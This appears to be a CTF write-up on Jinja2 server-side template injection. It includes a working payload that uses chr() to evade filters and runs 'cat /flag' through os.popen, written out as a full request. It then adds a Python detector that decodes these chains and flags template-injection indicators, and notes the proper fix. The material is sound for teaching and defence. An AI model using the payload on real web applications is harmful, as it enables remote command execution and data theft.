{{().__class__.__bases__[0].__subclasses__()[0].__init__.__globals__.__builtins__.chr}}
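The brute-force result shows that index 80 of __subclasses__() is a class that exposes chr,
so chr() is available. Next, put the following string at the front of the payload:
{%set+chr=[].__class__.__bases__[0].__subclasses__()[80].__init__.__globals__.__builtins__.chr%}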
The original payload is:
{{ config.__class__.__init__.__globals__['os'].popen('cat /flag').read() }}
Next, replace the string literals with chr() calls, using the ASCII table (%2b is the URL-encoded +):
'os' becomes chr(111)%2bchr(115)
'cat /flag' becomes chr(99)%2bchr(97)%2bchr(116)%2bchr(32)%2bchr(47)%2bchr(102)%2bchr(108)%2bchr(97)%2bchr(103)
The final request:
?name={%set+chr=[].__class__.__bases__[0].__subclasses__()[80].__init__.__globals__.__builtins__.chr%}{{ config.__class__.__init__.__globals__[chr(111)%2bchr(115)].popen(chr(99)%2bchr(97)%2bchr(116)%2bchr(32)%2bchr(47)%2bchr(102)%2bchr(108)%2bchr(97)%2bchr(103)).read() }}
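From the defender's side, the chr() substitution above only hides the strings from filters that match on quotes or literal keywords. Folding the chr() chains back into text before inspection recovers them. The following is an added example, not part of the original write-up. The names fold_chr_chains, inspect_param and INDICATORS are hypothetical, the indicator list is illustrative rather than complete, and SAMPLE is constructed from the request shown on this page.

```python
import re
from urllib.parse import unquote_plus

# One or more chr(N) calls joined by "+", the pattern used in the request above.
CHR_CHAIN = re.compile(r"chr\(\s*\d{1,7}\s*\)(?:\s*\+\s*chr\(\s*\d{1,7}\s*\))*")
# Template delimiters and attribute names typical of Jinja2 SSTI probes
# (illustrative list, an assumption of this example, not a full signature set).
INDICATORS = ("{{", "{%", "__class__", "__subclasses__",
              "__globals__", "__builtins__", "popen")

# Constructed sample: the value of the "name" parameter as it appears on the wire.
SAMPLE = (
    "{%set+chr=[].__class__.__bases__[0].__subclasses__()[80]"
    ".__init__.__globals__.__builtins__.chr%}"
    "{{config.__class__.__init__.__globals__[chr(111)%2bchr(115)].popen("
    "chr(99)%2bchr(97)%2bchr(116)%2bchr(32)%2bchr(47)%2bchr(102)"
    "%2bchr(108)%2bchr(97)%2bchr(103)).read()}}"
)


def fold_chr_chains(text):
    """Replace each chr(a)+chr(b)+... chain with the quoted string it builds."""
    def fold(match):
        codes = [int(n) for n in re.findall(r"\d+", match.group(0))]
        if any(c > 0x10FFFF for c in codes):
            return match.group(0)  # not a valid code point: leave untouched
        return repr("".join(chr(c) for c in codes))
    return CHR_CHAIN.sub(fold, text)


def inspect_param(raw_value):
    """URL-decode a raw query value, fold chr() chains, report indicators."""
    decoded = unquote_plus(raw_value)      # "%2b" -> "+", "+" -> space
    normalized = fold_chr_chains(decoded)
    hits = [m for m in INDICATORS if m in normalized]
    return {"normalized": normalized, "indicators": hits,
            "suspicious": bool(hits)}


if __name__ == "__main__":
    report = inspect_param(SAMPLE)
    print(report["normalized"])
    print(report["indicators"])
```

Matching like this is only a detection aid for logs or a request filter. The underlying fix is to stop rendering user input as a template and pass it in as a template variable instead.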